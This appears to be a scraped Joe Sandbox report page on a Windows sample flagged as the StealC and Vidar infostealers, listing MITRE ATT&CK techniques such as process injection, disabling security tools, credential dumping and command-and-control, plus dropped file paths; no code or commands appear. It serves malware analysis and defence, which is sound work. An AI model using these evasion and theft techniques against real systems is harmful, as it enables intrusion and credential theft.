Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TNQTc6Qmkg.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AEHIECAFCGDBFHIDBKFC

C:\ProgramData\BQJUWOYRTO.xlsx

C:\ProgramData\CGHCGIIDGDAKFIEBKFCF

C:\ProgramData\DAKFCGIJKJKFHIDHIIIEBGCBFB

C:\ProgramData\DGDBAKKJ

C:\ProgramData\DVWHKMNFNN.docx

C:\ProgramData\DVWHKMNFNN.xlsx

C:\ProgramData\EEGWXUHVUG.docx

Windows Analysis Report
TNQTc6Qmkg.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre